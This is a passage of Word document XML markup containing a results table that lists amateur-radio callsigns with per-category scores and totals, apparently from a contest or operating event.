          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KV8Z</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>70</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F28DF8" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KD8KBX</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>115</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D2B52" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>K8MDA</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>112</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B3ECE3" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KC8WH</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E93A34B" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>AC8NP</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>109</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EC647E" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>WB8SIQ</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D7ED26" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>AC8RV</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B18734" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>WB8YYS</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>94</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129C7DF1" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>KL7RF</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>TOTAL</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1898508C" w14:textId="77777777" w:rsidR="001F5896" w:rsidRPr="001F5896" w:rsidRDefault="001F5896" w:rsidP="001F5896">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:t>K8KRA</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="001F5896">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:eastAsia="ar-SA"/>
        </w:rPr>
        <w:tab/>
